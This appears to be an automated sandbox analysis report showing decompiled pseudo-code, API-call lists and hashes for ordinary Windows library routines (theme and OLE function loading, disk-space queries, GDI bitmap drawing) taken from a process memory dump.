                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00426C08), ref: 00426BB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 20eca826a7c097c8b561a1868e70621d2d596527ff6c5eb6183a51e80d6d6c18
                                                                            • Instruction ID: b393943444db6a942bd8341528f497628a2ff302c99bfacefed951aae1c827a6
                                                                            • Opcode Fuzzy Hash: 20eca826a7c097c8b561a1868e70621d2d596527ff6c5eb6183a51e80d6d6c18
                                                                            • Instruction Fuzzy Hash: CE01D8703042645FD711EB619C92BD6769CE758704F9240BBFA44E61C1DAB8AD80891D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00408F92(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    long _v8;
    long _v12;
    long _v16;
    long _v20;
    intOrPtr _v24;
    signed int _v28;
    CHAR* _t25;
    int _t26;
    intOrPtr _t31;
    intOrPtr _t34;
    intOrPtr* _t39;
    intOrPtr* _t40;
    intOrPtr _t48;
    intOrPtr _t50;

    _t25 = _a4;
    if(_t25 == 0) {
        _t25 = 0;
    }
    _t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
    _v28 = _v8 * _v12;
    _v24 = 0;
    _t48 = _v24;
    _t31 = E00405670(_v28, _t48, _v16, 0);
    _t39 = _a8;
    *_t39 = _t31;
    *((intOrPtr*)(_t39 + 4)) = _t48;
    _t50 = _v24;
    _t34 = E00405670(_v28, _t50, _v20, 0);
    _t40 = _a12;
    *_t40 = _t34;
    *((intOrPtr*)(_t40 + 4)) = _t50;
    return _t26;
}

                                                                            APIs
                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408FB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DiskFreeSpace
                                                                            • String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
E0042B5CC(void* __ebx, void* __ecx) {
    char _v5;
    intOrPtr _t2;
    intOrPtr _t6;
    intOrPtr _t108;
    intOrPtr _t111;

    _t2 = *0x466474; // 0x270a870
    E0042B3FC(_t2);
    _push(_t111);
    _push(0x42b97f);
    _push( *[fs:eax]);
    *[fs:eax] = _t111;
    *0x466470 = *0x466470 + 1;
    if( *0x46646c == 0) {
        *0x46646c = LoadLibraryA("uxtheme.dll");
        if( *0x46646c > 0) {
            *0x4663ac = GetProcAddress( *0x46646c, "OpenThemeData");
            *0x4663b0 = GetProcAddress( *0x46646c, "CloseThemeData");
            *0x4663b4 = GetProcAddress( *0x46646c, "DrawThemeBackground");
            *0x4663b8 = GetProcAddress( *0x46646c, "DrawThemeText");
            *0x4663bc = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect");
            *0x4663c0 = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect");
            *0x4663c4 = GetProcAddress( *0x46646c, "GetThemePartSize");
            *0x4663c8 = GetProcAddress( *0x46646c, "GetThemeTextExtent");
            *0x4663cc = GetProcAddress( *0x46646c, "GetThemeTextMetrics");
            *0x4663d0 = GetProcAddress( *0x46646c, "GetThemeBackgroundRegion");
            *0x4663d4 = GetProcAddress( *0x46646c, "HitTestThemeBackground");
            *0x4663d8 = GetProcAddress( *0x46646c, "DrawThemeEdge");
            *0x4663dc = GetProcAddress( *0x46646c, "DrawThemeIcon");
            *0x4663e0 = GetProcAddress( *0x46646c, "IsThemePartDefined");
            *0x4663e4 = GetProcAddress( *0x46646c, "IsThemeBackgroundPartiallyTransparent");
            *0x4663e8 = GetProcAddress( *0x46646c, "GetThemeColor");
            *0x4663ec = GetProcAddress( *0x46646c, "GetThemeMetric");
            *0x4663f0 = GetProcAddress( *0x46646c, "GetThemeString");
            *0x4663f4 = GetProcAddress( *0x46646c, "GetThemeBool");
            *0x4663f8 = GetProcAddress( *0x46646c, "GetThemeInt");
            *0x4663fc = GetProcAddress( *0x46646c, "GetThemeEnumValue");
            *0x466400 = GetProcAddress( *0x46646c, "GetThemePosition");
            *0x466404 = GetProcAddress( *0x46646c, "GetThemeFont");
            *0x466408 = GetProcAddress( *0x46646c, "GetThemeRect");
            *0x46640c = GetProcAddress( *0x46646c, "GetThemeMargins");
            *0x466410 = GetProcAddress( *0x46646c, "GetThemeIntList");
            *0x466414 = GetProcAddress( *0x46646c, "GetThemePropertyOrigin");
            *0x466418 = GetProcAddress( *0x46646c, "SetWindowTheme");
            *0x46641c = GetProcAddress( *0x46646c, "GetThemeFilename");
            *0x466420 = GetProcAddress( *0x46646c, "GetThemeSysColor");
            *0x466424 = GetProcAddress( *0x46646c, "GetThemeSysColorBrush");
            *0x466428 = GetProcAddress( *0x46646c, "GetThemeSysBool");
            *0x46642c = GetProcAddress( *0x46646c, "GetThemeSysSize");
            *0x466430 = GetProcAddress( *0x46646c, "GetThemeSysFont");
            *0x466434 = GetProcAddress( *0x46646c, "GetThemeSysString");
            *0x466438 = GetProcAddress( *0x46646c, "GetThemeSysInt");
            *0x46643c = GetProcAddress( *0x46646c, "IsThemeActive");
            *0x466440 = GetProcAddress( *0x46646c, "IsAppThemed");
            *0x466444 = GetProcAddress( *0x46646c, "GetWindowTheme");
            *0x466448 = GetProcAddress( *0x46646c, "EnableThemeDialogTexture");
            *0x46644c = GetProcAddress( *0x46646c, "IsThemeDialogTextureEnabled");
            *0x466450 = GetProcAddress( *0x46646c, "GetThemeAppProperties");
            *0x466454 = GetProcAddress( *0x46646c, "SetThemeAppProperties");
            *0x466458 = GetProcAddress( *0x46646c, "GetCurrentThemeName");
            *0x46645c = GetProcAddress( *0x46646c, "GetThemeDocumentationProperty");
            *0x466460 = GetProcAddress( *0x46646c, "DrawThemeParentBackground");
            *0x466464 = GetProcAddress( *0x46646c, "EnableTheming");
        }
    }
    _v5 = *0x46646c > 0;
    _pop(_t108);
    *[fs:eax] = _t108;
    _push(0x42b986);
    _t6 = *0x466474; // 0x270a870
    return E0042B404(_t6);
}

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042B97F), ref: 0042B602
                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042B61A
                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042B62C
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042B63E
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042B650
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B662
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B674
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042B686
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042B698
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042B6AA
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042B6BC
                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042B6CE
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042B6E0
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042B6F2
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042B704
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042B716
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042B728
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042B73A
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042B74C
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042B75E
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042B770
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042B782
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042B794
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042B7A6
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042B7B8
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042B7CA
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042B7DC
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042B7EE
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042B800
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042B812
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042B824
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042B836
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042B848
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042B85A
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042B86C
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042B87E
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042B890
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042B8A2
                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042B8B4
                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042B8C6
                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042B8D8
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042B8EA
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042B8FC
                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042B90E
                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042B920
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042B932
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042B944
                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042B956
                                                                            Strings
                                                                            • GetThemeRect , xrefs: 0042B7B0
                                                                            • CloseThemeData , xrefs: 0042B624
                                                                            • DrawThemeBackground , xrefs: 0042B636
                                                                            • IsThemeBackgroundPartiallyTransparent , xrefs: 0042B70E
                                                                            • GetThemeSysBool , xrefs: 0042B840
                                                                            • GetThemePartSize , xrefs: 0042B67E
                                                                            • DrawThemeIcon , xrefs: 0042B6EA
                                                                            • GetThemeSysColorBrush , xrefs: 0042B82E
                                                                            • IsAppThemed , xrefs: 0042B8AC
                                                                            • GetThemeFont , xrefs: 0042B79E
                                                                            • EnableThemeDialogTexture , xrefs: 0042B8D0
                                                                            • GetThemeInt , xrefs: 0042B768
                                                                            • GetThemeDocumentationProperty , xrefs: 0042B92A
                                                                            • GetThemeBool , xrefs: 0042B756
                                                                            • GetThemeBackgroundContentRect , xrefs: 0042B65A, 0042B66C
                                                                            • GetThemeIntList , xrefs: 0042B7D4
                                                                            • GetThemePosition , xrefs: 0042B78C
                                                                            • GetThemeSysInt , xrefs: 0042B888
                                                                            • SetThemeAppProperties , xrefs: 0042B906
                                                                            • GetThemePropertyOrigin , xrefs: 0042B7E6
                                                                            • uxtheme.dll , xrefs: 0042B5FD
                                                                            • GetThemeSysString , xrefs: 0042B876
                                                                            • GetThemeMetric , xrefs: 0042B732
                                                                            • SetWindowTheme , xrefs: 0042B7F8
                                                                            • GetThemeMargins , xrefs: 0042B7C2
                                                                            • GetThemeSysColor , xrefs: 0042B81C
                                                                            • GetThemeString , xrefs: 0042B744
                                                                            • GetCurrentThemeName , xrefs: 0042B918
                                                                            • GetThemeSysFont , xrefs: 0042B864
                                                                            • DrawThemeEdge , xrefs: 0042B6D8
                                                                            • OpenThemeData , xrefs: 0042B612
                                                                            • GetThemeTextExtent , xrefs: 0042B690
                                                                            • IsThemeActive , xrefs: 0042B89A
                                                                            • GetThemeEnumValue , xrefs: 0042B77A
                                                                            • GetThemeBackgroundRegion , xrefs: 0042B6B4
                                                                            • EnableTheming , xrefs: 0042B94E
                                                                            • GetThemeSysSize , xrefs: 0042B852
                                                                            • GetWindowTheme , xrefs: 0042B8BE
                                                                            • HitTestThemeBackground , xrefs: 0042B6C6
                                                                            • IsThemePartDefined , xrefs: 0042B6FC
                                                                            • IsThemeDialogTextureEnabled , xrefs: 0042B8E2
                                                                            • GetThemeFilename , xrefs: 0042B80A
                                                                            • DrawThemeText , xrefs: 0042B648
                                                                            • GetThemeColor , xrefs: 0042B720
                                                                            • GetThemeAppProperties , xrefs: 0042B8F4
                                                                            • GetThemeTextMetrics , xrefs: 0042B6A2
                                                                            • DrawThemeParentBackground , xrefs: 0042B93C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0040E778() {
    struct HINSTANCE__* _v8;
    intOrPtr _t46;
    void* _t91;

    _v8 = GetModuleHandleA("oleaut32.dll");
    *0x466228 = E0040E74C("VariantChangeTypeEx", E0040E2C4, _t91);
    *0x46622c = E0040E74C("VarNeg", E0040E2F4, _t91);
    *0x466230 = E0040E74C("VarNot", E0040E2F4, _t91);
    *0x466234 = E0040E74C("VarAdd", E0040E300, _t91);
    *0x466238 = E0040E74C("VarSub", E0040E300, _t91);
    *0x46623c = E0040E74C("VarMul", E0040E300, _t91);
    *0x466240 = E0040E74C("VarDiv", E0040E300, _t91);
    *0x466244 = E0040E74C("VarIdiv", E0040E300, _t91);
    *0x466248 = E0040E74C("VarMod", E0040E300, _t91);
    *0x46624c = E0040E74C("VarAnd", E0040E300, _t91);
    *0x466250 = E0040E74C("VarOr", E0040E300, _t91);
    *0x466254 = E0040E74C("VarXor", E0040E300, _t91);
    *0x466258 = E0040E74C("VarCmp", E0040E30C, _t91);
    *0x46625c = E0040E74C("VarI4FromStr", E0040E318, _t91);
    *0x466260 = E0040E74C("VarR4FromStr", E0040E384, _t91);
    *0x466264 = E0040E74C("VarR8FromStr", E0040E3F0, _t91);
    *0x466268 = E0040E74C("VarDateFromStr", E0040E45C, _t91);
    *0x46626c = E0040E74C("VarCyFromStr", E0040E4C8, _t91);
    *0x466270 = E0040E74C("VarBoolFromStr", E0040E534, _t91);
    *0x466274 = E0040E74C("VarBstrFromCy", E0040E5B4, _t91);
    *0x466278 = E0040E74C("VarBstrFromDate", E0040E624, _t91);
    _t46 = E0040E74C("VarBstrFromBool", E0040E698, _t91);
    *0x46627c = _t46;
    return _t46;
}

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040E781
                                                                              • Part of subcall function 0040E74C: GetProcAddress.KERNEL32(00000000), ref: 0040E765
                                                                            Strings
                                                                            • VarOr , xrefs: 0040E86B
                                                                            • VarBstrFromBool , xrefs: 0040E95D
                                                                            • VarBstrFromCy , xrefs: 0040E931
                                                                            • VarDiv , xrefs: 0040E813
                                                                            • VarNot , xrefs: 0040E7BB
                                                                            • VarDateFromStr , xrefs: 0040E8EF
                                                                            • VarIdiv , xrefs: 0040E829
                                                                            • VarXor , xrefs: 0040E881
                                                                            • VarCmp , xrefs: 0040E897
                                                                            • VarR4FromStr , xrefs: 0040E8C3
                                                                            • VarR8FromStr , xrefs: 0040E8D9
                                                                            • VarNeg , xrefs: 0040E7A5
                                                                            • VarAdd , xrefs: 0040E7D1
                                                                            • VarBoolFromStr , xrefs: 0040E91B
                                                                            • VarCyFromStr , xrefs: 0040E905
                                                                            • oleaut32.dll , xrefs: 0040E77C
                                                                            • VarBstrFromDate , xrefs: 0040E947
                                                                            • VariantChangeTypeEx , xrefs: 0040E78F
                                                                            • VarSub , xrefs: 0040E7E7
                                                                            • VarI4FromStr , xrefs: 0040E8AD
                                                                            • VarMod , xrefs: 0040E83F
                                                                            • VarAnd , xrefs: 0040E855
                                                                            • VarMul , xrefs: 0040E7FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                            • API String ID: 1646373207-1918263038
                                                                            • Opcode ID: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e
                                                                            • Instruction ID: 8f20ae1609fd2dd0fa028a6c57cffb4e97aaf0264b3ec7f3cdfbc11af4dc0977
                                                                            • Opcode Fuzzy Hash: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e
                                                                            • Instruction Fuzzy Hash: 424124A16052045BE3047B6F785552BBB99D648714360CC7FF804FB6E1EB7CAC618A2F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                                                                                  E00426DC4(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) { 				int _v8; 				int _v12; 				char _v13; 				struct HDC__* _v20; 				void* _v24; 				void* _v28; 				long _v32; 				long _v36; 				struct HPALETTE__* _v40; 				intOrPtr* _t78; 				struct HPALETTE__* _t89; 				struct HPALETTE__* _t95; 				int _t169; 				intOrPtr _t176; 				intOrPtr _t177; 				struct HDC__* _t179; 				int _t181; 				void* _t183; 				void* _t184; 				intOrPtr _t185;  				_t183 = _t184; 				_t185 = _t184 + 0xffffffdc; 				_v12 = __ecx; 				_v8 = __edx; 				_t179 = __eax; 				_t181 = _a16; 				_t169 = _a20; 				_v13 = 1; 				_t78 =  *0x462f2c; // 0x4617c0 				if( *_t78 != 2 || _t169 != _a40 || _t181 != _a36) { 					_v40 = 0; 					_v20 = E00426C14(CreateCompatibleDC(0)); 					_push(_t183); 					_push(0x427039); 					_push( *[fs:eax]); 					 *[fs:eax] = _t185; 					_v24 = E00426C14(CreateCompatibleBitmap(_a32, _t169, _t181)); 					_v28 = SelectObject(_v20, _v24); 					_t89 =  *0x46634c; // 0x65080609 					_v40 = SelectPalette(_a32, _t89, 0); 					SelectPalette(_a32, _v40, 0); 					if(_v40 == 0) { 						_t95 =  *0x46634c; // 0x65080609 						_v40 = SelectPalette(_v20, _t95, 0xffffffff); 					} else { 						_v40 = SelectPalette(_v20, _v40, 0xffffffff); 					} 					RealizePalette(_v20); 					StretchBlt(_v20, 0, 0, _t169, _t181, _a12, _a8, _a4, _t169, _t181, 0xcc0020); 					StretchBlt(_v20, 0, 0, _t169, _t181, _a32, _a28, _a24, _t169, _t181, 0x440328); 					_v32 = SetTextColor(_t179, 0); 					_v36 = SetBkColor(_t179, 0xffffff); 					StretchBlt(_t179, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t169, _t181, 0x8800c6); 					StretchBlt(_t179, _v8, _v12, _a40, _a36, _v20, 0, 0, _t169, _t181, 0x660046); 					SetTextColor(_t179, 
_v32); 					SetBkColor(_t179, _v36); 					if(_v28 != 0) { 						SelectObject(_v20, _v28); 					} 					DeleteObject(_v24); 					_pop(_t176); 					 *[fs:eax] = _t176; 					_push(0x427040); 					if(_v40 != 0) { 						SelectPalette(_v20, _v40, 0); 					} 					return DeleteDC(_v20); 				} else { 					_v24 = E00426C14(CreateCompatibleBitmap(_a32, 1, 1)); 					_v24 = SelectObject(_a12, _v24); 					_push(_t183); 					_push(0x426e8c); 					_push( *[fs:eax]); 					 *[fs:eax] = _t185; 					MaskBlt(_t179, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, 0xccaa0029); 					_pop(_t177); 					 *[fs:eax] = _t177; 					_push(0x427040); 					_v24 = SelectObject(_a12, _v24); 					return DeleteObject(_v24); 				} 			}                        


                                                                            APIs
                                                                            • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00426E07
                                                                            • SelectObject.GDI32(?,?), ref: 00426E1C
                                                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,00426E8C,?,?), ref: 00426E60
                                                                            • SelectObject.GDI32(?,?), ref: 00426E7A
                                                                            • DeleteObject.GDI32(?), ref: 00426E86
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00426E9A
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00426EBB
                                                                            • SelectObject.GDI32(?,?), ref: 00426ED0
                                                                            • SelectPalette.GDI32(?,65080609,00000000), ref: 00426EE4
                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00426EF6
                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00426F0B
                                                                            • SelectPalette.GDI32(?,65080609,000000FF), ref: 00426F21
                                                                            • RealizePalette.GDI32(?), ref: 00426F2D
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00426F4F
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00426F71
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00426F79
                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 00426F87
                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00426FB3
                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426FD8
                                                                            • SetTextColor.GDI32(?,?), ref: 00426FE2
                                                                            • SetBkColor.GDI32(?,?), ref: 00426FEC
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426FFF
                                                                            • DeleteObject.GDI32(?), ref: 00427008
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0042702A
                                                                            • DeleteDC.GDI32(?), ref: 00427033
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                            • String ID:
                                                                            • API String ID: 3976802218-0
                                                                            • Opcode ID: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f
                                                                            • Instruction ID: 9a8f0c8cc2b2705459631c9561ebf8b7562dc7de34ad384d938fd6bc3ac72156
                                                                            • Opcode Fuzzy Hash: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f
                                                                            • Instruction Fuzzy Hash: B681A4B1A00219AFDB50EFA9CD81EAF77FCEB0D714F124459F618E7281C239AD108B65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                                                                                  E00428D58(void* __eax, long __ecx, struct HPALETTE__* __edx) { 				struct HBITMAP__* _v8; 				struct HDC__* _v12; 				struct HDC__* _v16; 				struct HDC__* _v20; 				char _v21; 				void* _v28; 				void* _v32; 				intOrPtr _v92; 				intOrPtr _v96; 				int _v108; 				int _v112; 				void _v116; 				int _t68; 				long _t82; 				void* _t117; 				intOrPtr _t126; 				intOrPtr _t127; 				long _t130; 				struct HPALETTE__* _t133; 				void* _t137; 				void* _t139; 				intOrPtr _t140;  				_t137 = _t139; 				_t140 = _t139 + 0xffffff90; 				_t130 = __ecx; 				_t133 = __edx; 				_t117 = __eax; 				_v8 = 0; 				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) { 					return _v8; 				} else { 					E0042824C(_t117); 					_v12 = 0; 					_v20 = 0; 					_push(_t137); 					_push(0x428f53); 					_push( *[fs:eax]); 					 *[fs:eax] = _t140; 					_v12 = E00426C14(GetDC(0)); 					_v20 = E00426C14(CreateCompatibleDC(_v12)); 					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0); 					if(_v8 == 0) { 						L17: 						_t68 = 0; 						_pop(_t126); 						 *[fs:eax] = _t126; 						_push(0x428f5a); 						if(_v20 != 0) { 							_t68 = DeleteDC(_v20); 						} 						if(_v12 != 0) { 							return ReleaseDC(0, _v12); 						} 						return _t68; 					} else { 						_v32 = SelectObject(_v20, _v8); 						if(_t130 != 0x1fffffff) { 							_v16 = E00426C14(CreateCompatibleDC(_v12)); 							_push(_t137); 							_push(0x428f0b); 							_push( *[fs:eax]); 							 *[fs:eax] = _t140; 							if(_v96 == 0) { 								_v21 = 0; 							} else { 								_v21 = 1; 								_v92 = 0; 								_t117 = E00428690(_t117, _t133, _t133, 0,  &_v116); 							} 							_v28 = SelectObject(_v16, _t117); 							if(_t133 != 0) { 								SelectPalette(_v16, _t133, 0); 								RealizePalette(_v16); 								SelectPalette(_v20, _t133, 0); 								RealizePalette(_v20); 							} 							_t82 = SetBkColor(_v16, _t130); 
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020); 							SetBkColor(_v16, _t82); 							if(_v28 != 0) { 								SelectObject(_v16, _v28); 							} 							if(_v21 != 0) { 								DeleteObject(_t117); 							} 							_pop(_t127); 							 *[fs:eax] = _t127; 							_push(0x428f12); 							return DeleteDC(_v16); 						} else { 							PatBlt(_v20, 0, 0, _v112, _v108, 0x42); 							if(_v32 != 0) { 								SelectObject(_v20, _v32); 							} 							goto L17; 						} 					} 				} 			}                        


                                                                            APIs
                                                                            • GetObjectA.GDI32(?,00000054,?), ref: 00428D7B
                                                                            • GetDC.USER32(00000000), ref: 00428DA9
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00428DBA
                                                                            • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00428DD5
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428DEF
                                                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00428E11
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00428E1F
                                                                            • SelectObject.GDI32(?), ref: 00428E67
                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00428E7A
                                                                            • RealizePalette.GDI32(?), ref: 00428E83
